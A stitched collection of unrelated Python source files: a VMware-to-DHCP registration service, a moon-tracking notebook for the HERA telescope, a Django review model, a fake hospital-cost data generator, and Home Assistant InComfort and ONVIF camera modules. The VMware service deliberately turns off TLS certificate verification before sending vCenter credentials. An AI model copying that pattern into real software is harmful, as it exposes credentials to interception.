# Filter out if the registered guest OS is not managed by our DHCP
if re.match(UNMANAGED_GUESTID_REGEXP, event.vm.vm.config.guestId, re.IGNORECASE):
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='unsupported_os').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_name').time():
# Filter out badly formatted VM name
if not FQDN_VALIDATION_REGEXP.match(event.vm.vm.config.name):
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='bad_name').inc()
return False
# we have a winner!
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='accepted').inc()
return True
def dhcpConnect(self):
global dhcpServer
logger.info('Connecting to DHCP server: {0}'.format(self.cfg['dhcp_address']))
try:
dhcpServer = MyOmapi(self.cfg['dhcp_address'], self.cfg['dhcp_port'], self.cfg['dhcp_key_name'], self.cfg['dhcp_key_value'])
except Exception as e:
logger.critical('Unable to connect to DHCP server: {0}'.format(e))
sys.exit(-1)
logger.info('Connected to DHCP server!')
def dhcpDisconnect(self):
global dhcpServer
logger.info('Disconnecting from DHCP server: {0}'.format(self.cfg['dhcp_address']))
try:
dhcpServer.close()
except Exception as e:
      logger.critical('Error occurred during disconnection: {0}'.format(e))
logger.info('Disconnected from DHCP server')
def registerVm(self,vm,cf):
global dhcpServer
macAddressList = []
relevantCustomFields = {}
dhcpOptions = {}
logger.debug('List of published custom attributes: {0}'.format(cf))
with DHCPD_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='connect').time():
self.dhcpConnect()
for field in cf:
if field.managedObjectType == vim.VirtualMachine and field.name.startswith(self.cfg['vc_customattribute_dhcpoption_namespace']):
relevantCustomFields[field.key] = re.sub('^%s' % re.escape(self.cfg['vc_customattribute_dhcpoption_namespace']), '', field.name)
logger.debug('List of custom attributes that will be pushed as dhcp option: {0}'.format(relevantCustomFields))
# Split name/domain-name from VM name
fqdnMatch = FQDN_VALIDATION_REGEXP.match(vm.config.name)
# Looking for the VM mac addresses
for dev in vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualEthernetCard):
macAddressList.append(dev.macAddress)
for field in vm.customValue:
if field.key in relevantCustomFields:
dhcpOptions[relevantCustomFields[field.key]]= field.value
for macAddress in macAddressList:
while True:
try:
with DHCPD_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='del_host').time():
dhcpServer.del_host(macAddress)
except pypureomapi.OmapiErrorNotFound as e:
FAILURE_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], exception=e).inc()
pass
except Exception as e:
FAILURE_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], exception=e).inc()
          logger.error('Error occurred while unregistering VM in DHCP server: {0}'.format(e))
try:
dhcpOptions['host-name'] = fqdnMatch.group(1)
dhcpOptions['domain-name'] = fqdnMatch.group(2)
logger.debug('DHCP options: {0}'.format(dhcpOptions))
logger.debug('Mac address: {0}'.format(macAddress))
with DHCPD_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='add_host').time():
dhcpServer.add_host_with_options(macAddress, dhcpOptions, self.cfg['dhcp_group'] )
except Exception as e:
FAILURE_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], exception=e).inc()
          logger.error('Error occurred while registering VM in DHCP server: {0}'.format(e))
break
with DHCPD_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='disconnect').time():
self.dhcpDisconnect()
return
def start(self):
# Disable SSL certificate checking
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_NONE
# Start Prometheus client if asked to
if self.cfg['prom_enabled']:
start_http_server( self.cfg['prom_port'] )
# set Info metric
i = Info('vmware2dhcp_info', 'A metric with a constant \'1\' value labeled by several service info')
i.info({'version': __version__, 'vc': self.cfg['vc_address'], 'dhcp': self.cfg['dhcp_address']})
si = None
# Getting the Service Instance
logger.info('Connecting to VSphere server: {0}'.format(self.cfg['vc_address']))
try:
with VSPHERE_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='connect').time():
si = SmartConnect(protocol='https',host=self.cfg['vc_address'],port=443,user=self.cfg['vc_username'],pwd=self.cfg['vc_password'],sslContext=context)
except Exception as e:
print('Could not connect to the specified vCenter, please check the provided address, username and password: {0}'.format(e))
raise SystemExit(-1)
logger.info('Connected to VSphere server!')
#Cleanly disconnect
atexit.register(Disconnect, si)
em = si.content.eventManager
efs = vim.event.EventFilterSpec(eventTypeId=list(map(lambda x: x.__name__,VMWARE_MONITORED_EVENTS)))
now = datetime.now(timezone('UTC'))
efs.time = self.createTimeFilter(now,now)
ehc = em.CreateCollectorForEvents(efs)
ehc.SetCollectorPageSize(VMWARE_EVENTS_PAGE_SIZE)
lastEventTimeUTC = None
while True:
if lastEventTimeUTC is not None:
logger.info('Waiting for event. Last event time: {0}'.format(lastEventTimeUTC))
startTime = lastEventTimeUTC + timedelta(seconds=1)
endTime = datetime.now(timezone('UTC'))
efs.time = self.createTimeFilter(startTime,endTime)
try:
ehc.DestroyCollector()
ehc = em.CreateCollectorForEvents(efs)
except:
lastEventTimeUTC = lastEventTimeUTC + timedelta(seconds=1)
else:
lastEventTimeUTC = now
with VSPHERE_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='read_next_events').time():
events = ehc.ReadNextEvents(VMWARE_EVENTS_PAGE_SIZE)
while len(events) > 0:
logger.debug('Received {0} event(s)'.format(len(events)))
for idx, event in enumerate(events):
logger.debug('Event #{0} at {1}: {2}'.format(idx, event.createdTime, event.fullFormattedMessage))
logger.debug('Event data: {0}'.format(event))
VMWARE_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event=event.__class__.__name__).inc()
if isinstance(event, tuple(VMWARE_MONITORED_ADD_EVENTS)):
if self.filterEvent(event):
self.registerVm(event.vm.vm, si.content.customFieldsManager.field)
elif isinstance(event, tuple(VMWARE_MONITORED_UPDATE_EVENTS)):
if self.filterEvent(event):
self.registerVm(event.vm.vm, si.content.customFieldsManager.field)
elif isinstance(event, tuple(VMWARE_MONITORED_REMOVE_EVENTS)):
# not implemented. Virtual Machine object properties are lost when this event pops up
pass
lastEventTimeUTC = event.createdTime
events = ehc.ReadNextEvents(VMWARE_EVENTS_PAGE_SIZE)
time.sleep(SLEEP_TIME)
return 0
```
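A sketch of the configuration dictionary `Vmware2dhcp` expects, inferred purely from the `self.cfg[...]` lookups above; every value is a placeholder (7911 is the conventional OMAPI port).

```python
cfg = {
    "vc_address": "vcenter.example.com",
    "vc_username": "monitor",
    "vc_password": "secret",
    "vc_customattribute_dhcpoption_namespace": "dhcp.",
    "dhcp_address": "dhcp.example.com",
    "dhcp_port": 7911,
    "dhcp_key_name": "omapi_key",
    "dhcp_key_value": "<base64-encoded key>",
    "dhcp_group": None,
    "vm_networks": ["provisioning"],
    "prom_enabled": True,
    "prom_port": 8000,
}
Vmware2dhcp(cfg).start()
```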
|
{
"source": "jeanfdonet/CHAMP_ASU_Jean",
"score": 3
}
|
#### File: jeanfdonet/CHAMP_ASU_Jean/Moontracking.py
```python
import numpy as np
import matplotlib.pyplot as plt
from astropy.time import Time
from astropy.coordinates import Angle, EarthLocation, get_moon, get_sun
from astropy.units import deg
from MoonLSTs import zenithra, zenithdec
import os
import string
import pandas
get_ipython().magic(u'matplotlib notebook')
# In[47]:
path55 = "/data6/HERA/data/2458055/"
path42 = "/data6/HERA/data/2458042/"
# In[48]:
def get_julian_dates(path):
alpha_low = list(string.ascii_lowercase) #Setting lower-case alphabet
alpha_high = list(string.ascii_uppercase) #Setting upper-case alphabet
jd_list = [] #Instantiating list for JDs
for file in os.listdir(path): #Iterating over data directory
if ".xx" in file:
jd = "" #Setting empty string for individual date
for char in file: #Iterating over the file name itself
if char in alpha_low:
file = file.replace(char, "")
if char in alpha_high:
file = file.replace(char, "")
if char in ".":
file = file.replace(char, "") #Checking for other usual name chars
if char in "_":
file = file.replace(char, "")
file = list(file) #Date string to list to mutate JD
file.insert(7,".") #Inserting delimiter for JD format
file = ''.join(file) #Joining list into string
jd = jd + file #Assigning JD string to empty var
jd_list.append(float(jd)) #Appending float version of JD to JD list
jd_list = np.unique(jd_list) #Selecting unique values in case of repeat
return jd_list #Returning desired JD list
# In[88]:
jd55 = get_julian_dates(path55) #Creating JD lists for different datasets
print jd55
jd42 = get_julian_dates(path42)
#print jd42
# In[89]:
for jd in range(len(jd55)):
jd55[jd] += 2428.0
# print jd55
# jd55 = np.linspace(2460676.5,2460780.5,20000) #From JAN 1, 2025 to APR 15, 2025
# jd55 = np.linspace(2458340.5,2460780.5,20000) #From JAN 1, 2025 to APR 15, 2025
# jd55 = np.linspace(2458331.5,2458787.5,6000) #From today to OCT 31, 2019
# jd55 = np.linspace(2453887.5,2458326.5,15000) #From last Major Standstill to today
moon_times = jd55 #Setting moon_times list from JD list
t = Time(moon_times, format='jd') #Creating a Time object for get_moon
# In[9]:
zenithra_deg = np.rad2deg(zenithra)
zenithdec_deg = np.rad2deg(zenithdec)
print(zenithra_deg)
print(zenithdec_deg)
# In[10]:
#Setting HERA Latitude and Longitude
hera_lat = Angle((-30,43,17), unit=deg)
hera_lon = Angle((21,35,42), unit=deg)
#Creating an EarthLocation object for HERA
HERA = EarthLocation(lat=hera_lat, lon=hera_lon)
# In[90]:
#Creating get_moon object at HERA's location
moonpath = get_moon(t,location=HERA) #Returns RA, DEC, Dist in (deg,deg,km)
# print moonpath
# In[56]:
#Formatting the RA and dec to more familiar formats
ra_list = []
dec_list = []
#Retrieving RA in HH:mm:ss format
for h,m,s in zip(moonpath.ra.hms[0],moonpath.ra.hms[1],moonpath.ra.hms[2]):
ra = str(int(h))+"h "+str(int(m))+"m "+str(s)+"s"
ra_list.append(ra)
#Retrieving Dec in dd:mm:ss format
for d,m,s in zip(moonpath.dec.dms[0],moonpath.dec.dms[1],moonpath.dec.dms[2]):
dec = str(int(d))+"d "+str(int(m))+"m "+str(s)+"s"
dec_list.append(dec)
#Casting JD list of floats into strings due to approximation
jd55 = list(jd55)
for i in range(len(jd55)):
jd55[i] = str(jd55[i])
#Creating Pandas Data Frame for organized reading of the data
coords = {"JD":jd55, "Moon R.A.":ra_list, "Moon Dec":dec_list}
cols = ["JD", "Moon R.A.", "Moon Dec"]
frame = pandas.DataFrame(data=coords)
frame = frame[cols]
frame
# In[15]:
#Casting to string for datasets w/o moon due to Pandas approximation
jd42 = list(jd42)
for i in range(len(jd42)):
jd42[i] = str(jd42[i])
coords42 = {"JD": jd42}
pandas.DataFrame(data=coords42)
# In[91]:
sunpath = get_sun(t)
# print sunpath
# In[92]:
print(t.isot[1], t.isot[-1], moonpath.dec.deg[-1], zenithdec_deg, np.abs(moonpath.dec.deg[1]-zenithdec_deg))
# type(float(t[1]))
# In[98]:
zenithra_deg = np.rad2deg(zenithra)
zenithdec_deg = np.rad2deg(zenithdec)
dec_in = []
dec_out = []
adj_jds = []
jds_out = []
dec_opt = []
ra_opt = []
jds_opt = []
dec_opt2 = []
ra_opt2 = []
jds_opt2 = []
fig1 = plt.figure(figsize=(9.5,6.0), facecolor="black", edgecolor="white")
axes = plt.subplot(111)
axes.patch.set_facecolor("black")
plt.grid(True, color="white")
plt.yticks(color="white")
plt.xticks(color="white")
for spine in axes.spines.values():
spine.set_color("white")
for i in range(len(jd55)):
rel_ra = np.abs(moonpath.ra.deg[i]-sunpath.ra.deg[i])
# declist.append(moonpath.dec.deg[i])
# adj_jds.append(jd55[i])
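# Keep epochs where the Moon-Sun RA separation is between 90 and 270 deg (Moon opposite the Sun), folding separations past 180 deg back to the shortest angle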
if rel_ra>=90.0 and rel_ra<=270.0:
if rel_ra>180.0:
rel_ra = 360.0-rel_ra
# print "JDate", jd55[i], "Moon RA:",moonpath.ra.deg[i], "Sun RA:",sunpath.ra.deg[i], "Diff:", np.abs(moonpath.ra.deg[i]-sunpath.ra.deg[i])
if np.abs(moonpath.dec.deg[i]-zenithdec_deg)<=8.2215:
dec_opt.append(moonpath.dec.deg[i])
ra_opt.append(moonpath.ra.deg[i])
jds_opt.append(jd55[i])
# print jd55[i], t.isot[i], moonpath.ra.deg[i], moonpath.dec.deg[i]
if rel_ra>=178.0 and rel_ra<=182.0:
print(jd55[i], t.isot[i], moonpath.ra.deg[i], moonpath.dec.deg[i])
plt.plot(jd55[i],rel_ra,"o", c = "#0af00a", markersize=8.0
,markeredgewidth=0.9,markeredgecolor="black")
else:
plt.plot(jd55[i],rel_ra,"o", c = "#0af00a", markersize=4.0
,markeredgewidth=0.9,markeredgecolor="black")
else:
dec_in.append(moonpath.dec.deg[i])
adj_jds.append(jd55[i])
if rel_ra>=178.0 and rel_ra<=182.0:
plt.plot(jd55[i],rel_ra,"o", c="#d2d2d2", markersize=8.0
,markeredgewidth=0.9,markeredgecolor="black")
else:
plt.plot(jd55[i],rel_ra,"o", c="#838383", markersize=4.0
,markeredgewidth=0.9,markeredgecolor="black")
else:
dec_out.append(moonpath.dec.deg[i])
jds_out.append(jd55[i])
# if rel_ra<177.0:
# plt.plot(rel_ra,jd55[-i-1],"bo", markersize=4.0)
# if rel_ra>183.0:
# plt.plot(rel_ra,jd55[-i-1],"ro", markersize=4.0)
# plt.plot(moonpath.dec.deg[-i-1],jd55[-i-1],"bo", markersize=4.0)
# plt.plot(sunpath.dec.deg[-i-1],jd55[-i-1],"o",c="#ffce00", markersize=4.0)
plt.ylabel("Shortest Relative RA of the Sun snd Moon [$deg$]", color="white")
plt.xlabel("JDate [$J2000$]", color="white")
plt.title("Lunar Trajectory Over Time", fontweight="bold", color="white")
# plt.background_patch.set_fill(False)
# plt.yticks(jd55,fontsize=3)
# In[99]:
fig2 = plt.figure(figsize=(9.5,6.0), facecolor="black", edgecolor="white")
axes = plt.subplot(111)
axes.patch.set_facecolor("black")
plt.grid(True, color="white")
plt.yticks(color="white")
plt.xticks(color="white")
for spine in axes.spines.values():
spine.set_color("white")
plt.plot(adj_jds,dec_in,"wo", label=">90$^{\circ}$ from Sun", markersize=1.0)
plt.plot(jds_out,dec_out,"ro", label="<90$^{\circ}$ from Sun", markersize=1.0)
plt.plot(jds_opt,dec_opt,"x", c="#2ef900",label="Optimal", markersize=5.0)
plt.legend(loc="upper left")
plt.ylabel("Moon Declination", color="white")
plt.xlabel("JDate [$J2000$]", color="white")
plt.title("Lunar Declination Over Time", fontweight="bold", color="white")
# In[21]:
x = [1,2,3,4,5]
for i in range(len(x)):
x[i] += 1
print(x)
# In[22]:
len(jd55)
# In[23]:
zenithdec_deg
# In[95]:
len(t.isot)
# In[96]:
print(jds_opt)
# In[100]:
ra_opt, dec_opt
# In[37]:
print(list(range(100, 201)))
# In[74]:
type(1.0)
```
|
{
"source": "JeanFirmino/Ponto-turistico",
"score": 3
}
|
#### File: Ponto-turistico/avaliacoes/models.py
```python
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Avaliacao(models.Model):
user = models.ForeignKey( User, on_delete=models.CASCADE)
comentario = models.TextField( null = True, blank = True)
nota = models.DecimalField( max_digits = 3, decimal_places = 2)
data = models.DateTimeField( auto_now_add = True)
class Meta:
verbose_name_plural = "Avaliações"
def __str__(self):
return self.user.username
```
|
{
"source": "jeanfour-corp/d3andreact",
"score": 3
}
|
#### File: images/data-sources/createCSV.py
```python
import pandas as pd
import numpy as np
# Create random data for use with client application
# The random data created here will later be replaced by data stored on AWS
#
# Choose the number of weeks
w = 4*6
# Choose number of patients
n = 1000
# Choose cost per hospital stay/ negative outcome at each hospital
cost = [1000, 1500, 2000]
# Setup a database of appropriate length
db = pd.DataFrame(columns=['risk', 'totalnegative', 'hospital', 'costTS'])
# Population the db with fake data
risker = np.random.binomial(1, .2, n)
db['risk'] = risker
db['hospital'] = np.random.choice([0,1,2], n, p=[0.5, 1/3, 1/6])
# Calculate how many negative outcomes per patient
probability = [.025+.75*el for el in risker]
first = np.random.binomial(1, probability, n)
second = np.random.binomial(1, [.2*el for el in first], n)
third = np.random.binomial(1, [.3*el for el in second], n)
fourth = np.random.binomial(1, [.4*el for el in third], n)
db['totalnegative'] = np.add(np.add(np.add(first, second), third), fourth)
# Build a time series with the stay cost in any week where a negative outcome occurs
# Calculate how much money per week
def ts(m,c):
loc = np.random.choice(range(w), m)
f = lambda x: 1 if x in loc else 0
return [f(el)*c for el in range(w)]
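# e.g. ts(2, 1000) -> a length-w list with 1000 at up to two randomly drawn week indices (draws may repeat) and 0 elsewhere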
db['costTS'] = db.apply(lambda row: ts(row['totalnegative'], cost[row['hospital']]), axis=1)
filename = 'fakedata.csv'
db.to_csv(filename, index=False)
def newdf(db):
df = pd.DataFrame(columns=['week', 'risk', 'hospital', 'cost'])
for i in range(n):
patient = db.iloc[i]
df2 = pd.DataFrame(columns=['week', 'risk', 'hospital', 'cost'])
df2['week'] = np.random.choice(range(w), patient['totalnegative'])
df2['risk'] = patient['risk']
df2['hospital'] = patient['hospital']
df2['cost'] = cost[patient['hospital']]
df = pd.concat([df, df2])  # DataFrame.append is deprecated; concat is the supported equivalent
return df
df = newdf(db)
filename = 'hospitaldata.csv'
df.to_csv(filename, index=False)
```
|
{
"source": "jeanfpoulin/home-assistant",
"score": 2
}
|
#### File: components/incomfort/sensor.py
```python
from typing import Any, Dict, Optional
from homeassistant.components.sensor import ENTITY_ID_FORMAT
from homeassistant.const import (
DEVICE_CLASS_PRESSURE,
DEVICE_CLASS_TEMPERATURE,
PRESSURE_BAR,
TEMP_CELSIUS,
)
from homeassistant.util import slugify
from . import DOMAIN, IncomfortChild
INCOMFORT_HEATER_TEMP = "CV Temp"
INCOMFORT_PRESSURE = "CV Pressure"
INCOMFORT_TAP_TEMP = "Tap Temp"
INCOMFORT_MAP_ATTRS = {
INCOMFORT_HEATER_TEMP: ["heater_temp", "is_pumping"],
INCOMFORT_PRESSURE: ["pressure", None],
INCOMFORT_TAP_TEMP: ["tap_temp", "is_tapping"],
}
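# Each entry maps a sensor name to [state attribute, extra status attribute]; the extra attribute may be None when there is no additional state to expose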
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up an InComfort/InTouch sensor device."""
if discovery_info is None:
return
client = hass.data[DOMAIN]["client"]
heater = hass.data[DOMAIN]["heater"]
async_add_entities(
[
IncomfortPressure(client, heater, INCOMFORT_PRESSURE),
IncomfortTemperature(client, heater, INCOMFORT_HEATER_TEMP),
IncomfortTemperature(client, heater, INCOMFORT_TAP_TEMP),
]
)
class IncomfortSensor(IncomfortChild):
"""Representation of an InComfort/InTouch sensor device."""
def __init__(self, client, heater, name) -> None:
"""Initialize the sensor."""
super().__init__()
self._client = client
self._heater = heater
self._unique_id = f"{heater.serial_no}_{slugify(name)}"
self.entity_id = ENTITY_ID_FORMAT.format(f"{DOMAIN}_{slugify(name)}")
self._name = f"Boiler {name}"
self._device_class = None
self._state_attr = INCOMFORT_MAP_ATTRS[name][0]
self._unit_of_measurement = None
@property
def state(self) -> Optional[str]:
"""Return the state of the sensor."""
return self._heater.status[self._state_attr]
@property
def device_class(self) -> Optional[str]:
"""Return the device class of the sensor."""
return self._device_class
@property
def unit_of_measurement(self) -> Optional[str]:
"""Return the unit of measurement of the sensor."""
return self._unit_of_measurement
class IncomfortPressure(IncomfortSensor):
"""Representation of an InTouch CV Pressure sensor."""
def __init__(self, client, heater, name) -> None:
"""Initialize the sensor."""
super().__init__(client, heater, name)
self._device_class = DEVICE_CLASS_PRESSURE
self._unit_of_measurement = PRESSURE_BAR
class IncomfortTemperature(IncomfortSensor):
"""Representation of an InTouch Temperature sensor."""
def __init__(self, client, heater, name) -> None:
"""Initialize the signal strength sensor."""
super().__init__(client, heater, name)
self._attr = INCOMFORT_MAP_ATTRS[name][1]
self._device_class = DEVICE_CLASS_TEMPERATURE
self._unit_of_measurement = TEMP_CELSIUS
@property
def device_state_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the device state attributes."""
return {self._attr: self._heater.status[self._attr]}
```
#### File: components/onvif/camera.py
```python
import asyncio
import datetime as dt
import logging
import os
from aiohttp.client_exceptions import ClientConnectionError, ServerDisconnectedError
from haffmpeg.camera import CameraMjpeg
from haffmpeg.tools import IMAGE_JPEG, ImageFrame
import onvif
from onvif import ONVIFCamera, exceptions
import voluptuous as vol
from zeep.exceptions import Fault
from homeassistant.components.camera import PLATFORM_SCHEMA, SUPPORT_STREAM, Camera
from homeassistant.components.camera.const import DOMAIN
from homeassistant.components.ffmpeg import CONF_EXTRA_ARGUMENTS, DATA_FFMPEG
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
)
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.aiohttp_client import async_aiohttp_proxy_stream
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.service import async_extract_entity_ids
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "ONVIF Camera"
DEFAULT_PORT = 5000
DEFAULT_USERNAME = "admin"
DEFAULT_PASSWORD = "<PASSWORD>"
DEFAULT_ARGUMENTS = "-pred 1"
DEFAULT_PROFILE = 0
CONF_PROFILE = "profile"
ATTR_PAN = "pan"
ATTR_TILT = "tilt"
ATTR_ZOOM = "zoom"
DIR_UP = "UP"
DIR_DOWN = "DOWN"
DIR_LEFT = "LEFT"
DIR_RIGHT = "RIGHT"
ZOOM_OUT = "ZOOM_OUT"
ZOOM_IN = "ZOOM_IN"
PTZ_NONE = "NONE"
SERVICE_PTZ = "onvif_ptz"
ONVIF_DATA = "onvif"
ENTITIES = "entities"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_EXTRA_ARGUMENTS, default=DEFAULT_ARGUMENTS): cv.string,
vol.Optional(CONF_PROFILE, default=DEFAULT_PROFILE): vol.All(
vol.Coerce(int), vol.Range(min=0)
),
}
)
SERVICE_PTZ_SCHEMA = vol.Schema(
{
ATTR_ENTITY_ID: cv.entity_ids,
ATTR_PAN: vol.In([DIR_LEFT, DIR_RIGHT, PTZ_NONE]),
ATTR_TILT: vol.In([DIR_UP, DIR_DOWN, PTZ_NONE]),
ATTR_ZOOM: vol.In([ZOOM_OUT, ZOOM_IN, PTZ_NONE]),
}
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up a ONVIF camera."""
_LOGGER.debug("Setting up the ONVIF camera platform")
async def async_handle_ptz(service):
"""Handle PTZ service call."""
pan = service.data.get(ATTR_PAN, None)
tilt = service.data.get(ATTR_TILT, None)
zoom = service.data.get(ATTR_ZOOM, None)
all_cameras = hass.data[ONVIF_DATA][ENTITIES]
entity_ids = await async_extract_entity_ids(hass, service)
target_cameras = []
if not entity_ids:
target_cameras = all_cameras
else:
target_cameras = [
camera for camera in all_cameras if camera.entity_id in entity_ids
]
for camera in target_cameras:
await camera.async_perform_ptz(pan, tilt, zoom)
hass.services.async_register(
DOMAIN, SERVICE_PTZ, async_handle_ptz, schema=SERVICE_PTZ_SCHEMA
)
_LOGGER.debug("Constructing the ONVIFHassCamera")
hass_camera = ONVIFHassCamera(hass, config)
await hass_camera.async_initialize()
async_add_entities([hass_camera])
return
class ONVIFHassCamera(Camera):
"""An implementation of an ONVIF camera."""
def __init__(self, hass, config):
"""Initialize an ONVIF camera."""
super().__init__()
_LOGGER.debug("Importing dependencies")
_LOGGER.debug("Setting up the ONVIF camera component")
self._username = config.get(CONF_USERNAME)
self._password = config.get(CONF_PASSWORD)
self._host = config.get(CONF_HOST)
self._port = config.get(CONF_PORT)
self._name = config.get(CONF_NAME)
self._ffmpeg_arguments = config.get(CONF_EXTRA_ARGUMENTS)
self._profile_index = config.get(CONF_PROFILE)
self._ptz_service = None
self._input = None
_LOGGER.debug(
"Setting up the ONVIF camera device @ '%s:%s'", self._host, self._port
)
self._camera = ONVIFCamera(
self._host,
self._port,
self._username,
self._password,
"{}/wsdl/".format(os.path.dirname(onvif.__file__)),
)
async def async_initialize(self):
"""
Initialize the camera.
Initializes the camera by obtaining the input uri and connecting to
the camera. Also retrieves the ONVIF profiles.
"""
try:
_LOGGER.debug("Updating service addresses")
await self._camera.update_xaddrs()
await self.async_check_date_and_time()
await self.async_obtain_input_uri()
self.setup_ptz()
except ClientConnectionError as err:
_LOGGER.warning(
"Couldn't connect to camera '%s', but will retry later. Error: %s",
self._name,
err,
)
raise PlatformNotReady
except Fault as err:
_LOGGER.error(
"Couldn't connect to camera '%s', please verify "
"that the credentials are correct. Error: %s",
self._name,
err,
)
async def async_check_date_and_time(self):
"""Warns if camera and system date not synced."""
_LOGGER.debug("Setting up the ONVIF device management service")
devicemgmt = self._camera.create_devicemgmt_service()
_LOGGER.debug("Retrieving current camera date/time")
try:
system_date = dt_util.utcnow()
device_time = await devicemgmt.GetSystemDateAndTime()
if device_time:
cdate = device_time.UTCDateTime
cam_date = dt.datetime(
cdate.Date.Year,
cdate.Date.Month,
cdate.Date.Day,
cdate.Time.Hour,
cdate.Time.Minute,
cdate.Time.Second,
0,
dt_util.UTC,
)
_LOGGER.debug("Camera date/time: %s", cam_date)
_LOGGER.debug("System date/time: %s", system_date)
dt_diff = cam_date - system_date
dt_diff_seconds = dt_diff.total_seconds()
if dt_diff_seconds > 5:
_LOGGER.warning(
"The date/time on the camera is '%s', "
"which is different from the system '%s', "
"this could lead to authentication issues",
cam_date,
system_date,
)
except ServerDisconnectedError as err:
_LOGGER.warning(
"Couldn't get camera '%s' date/time. Error: %s", self._name, err
)
async def async_obtain_input_uri(self):
"""Set the input uri for the camera."""
_LOGGER.debug(
"Connecting with ONVIF Camera: %s on port %s", self._host, self._port
)
try:
_LOGGER.debug("Retrieving profiles")
media_service = self._camera.create_media_service()
profiles = await media_service.GetProfiles()
_LOGGER.debug("Retrieved '%d' profiles", len(profiles))
if self._profile_index >= len(profiles):
_LOGGER.warning(
"ONVIF Camera '%s' doesn't provide profile %d."
" Using the last profile.",
self._name,
self._profile_index,
)
self._profile_index = -1
_LOGGER.debug("Using profile index '%d'", self._profile_index)
_LOGGER.debug("Retrieving stream uri")
req = media_service.create_type("GetStreamUri")
req.ProfileToken = profiles[self._profile_index].token
req.StreamSetup = {
"Stream": "RTP-Unicast",
"Transport": {"Protocol": "RTSP"},
}
stream_uri = await media_service.GetStreamUri(req)
uri_no_auth = stream_uri.Uri
uri_for_log = uri_no_auth.replace("rtsp://", "rtsp://<user>:<password>@", 1)
self._input = uri_no_auth.replace(
"rtsp://", f"rtsp://{self._username}:{self._password}@", 1
)
_LOGGER.debug(
"ONVIF Camera Using the following URL for %s: %s",
self._name,
uri_for_log,
)
except exceptions.ONVIFError as err:
_LOGGER.error("Couldn't setup camera '%s'. Error: %s", self._name, err)
def setup_ptz(self):
"""Set up PTZ if available."""
_LOGGER.debug("Setting up the ONVIF PTZ service")
if self._camera.get_service("ptz", create=False) is None:
_LOGGER.debug("PTZ is not available")
else:
self._ptz_service = self._camera.create_ptz_service()
_LOGGER.debug("Completed set up of the ONVIF camera component")
async def async_perform_ptz(self, pan, tilt, zoom):
"""Perform a PTZ action on the camera."""
if self._ptz_service is None:
_LOGGER.warning("PTZ actions are not supported on camera '%s'", self._name)
return
if self._ptz_service:
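# Map the direction/zoom constants onto the signed unit velocities ContinuousMove expects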
pan_val = 1 if pan == DIR_RIGHT else -1 if pan == DIR_LEFT else 0
tilt_val = 1 if tilt == DIR_UP else -1 if tilt == DIR_DOWN else 0
zoom_val = 1 if zoom == ZOOM_IN else -1 if zoom == ZOOM_OUT else 0
req = {
"Velocity": {
"PanTilt": {"_x": pan_val, "_y": tilt_val},
"Zoom": {"_x": zoom_val},
}
}
try:
_LOGGER.debug(
"Calling PTZ | Pan = %d | Tilt = %d | Zoom = %d",
pan_val,
tilt_val,
zoom_val,
)
await self._ptz_service.ContinuousMove(req)
except exceptions.ONVIFError as err:
if "Bad Request" in err.reason:
self._ptz_service = None
_LOGGER.debug("Camera '%s' doesn't support PTZ.", self._name)
else:
_LOGGER.error("Error trying to perform PTZ action on camera '%s': %s", self._name, err)
async def async_added_to_hass(self):
"""Handle entity addition to hass."""
_LOGGER.debug("Camera '%s' added to hass", self._name)
if ONVIF_DATA not in self.hass.data:
self.hass.data[ONVIF_DATA] = {}
self.hass.data[ONVIF_DATA][ENTITIES] = []
self.hass.data[ONVIF_DATA][ENTITIES].append(self)
async def async_camera_image(self):
"""Return a still image response from the camera."""
_LOGGER.debug("Retrieving image from camera '%s'", self._name)
ffmpeg = ImageFrame(self.hass.data[DATA_FFMPEG].binary, loop=self.hass.loop)
image = await asyncio.shield(
ffmpeg.get_image(
self._input, output_format=IMAGE_JPEG, extra_cmd=self._ffmpeg_arguments
)
)
return image
async def handle_async_mjpeg_stream(self, request):
"""Generate an HTTP MJPEG stream from the camera."""
_LOGGER.debug("Handling mjpeg stream from camera '%s'", self._name)
ffmpeg_manager = self.hass.data[DATA_FFMPEG]
stream = CameraMjpeg(ffmpeg_manager.binary, loop=self.hass.loop)
await stream.open_camera(self._input, extra_cmd=self._ffmpeg_arguments)
try:
